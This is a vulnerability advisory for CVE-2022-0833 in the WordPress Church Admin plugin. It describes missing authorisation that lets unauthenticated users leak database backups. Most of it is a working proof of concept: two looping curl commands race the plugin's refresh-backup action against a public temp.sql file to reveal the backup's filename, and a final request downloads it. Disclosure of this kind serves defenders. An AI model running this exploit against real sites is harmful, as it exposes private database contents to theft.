Church Admin < 3.4.135 – Unauthenticated Plugin's Backup Disclosure | CVE 2022-0833

Description

The plugin does not have authorisation and CSRF in some of its action as well as requested files, allowing unauthenticated attackers to repeatedly request the "refresh-backup" action, and simultaneously keep requesting a publicly accessible temporary file generated by the plugin in order to disclose the final backup filename, which can then be fetched by the attacker to download the backup of the plugin's DB data

Proof of Concept

1. In one terminal, continuously fetch from http://127.0.0.1:8080/?action=refresh-backup:

while true; do curl -s 'http://127.0.0.1:8080/?action=refresh-backup' >/dev/null; done

2. In a second terminal, continuously fetch from /wp-content/uploads/church-admin-cache/temp.sql

while true; do curl -s http://127.0.0.1:8080/wp-content/uploads/church-admin-cache/temp.sql | grep '\.sql\.gz'; done

3. After a while, the backup filename should be found by the curl | grep
   command (second terminal), once found, abort the command in terminal one first,
   then the one in the second terminal - use the last output of the second terminal as the filename (<md5-hash>.sql.gz).

4. Download the backup by accessing it via http://127.0.0.1:8080/wp-content/uploads/church-admin-cache/<extracted-md5-hash>.sql.gz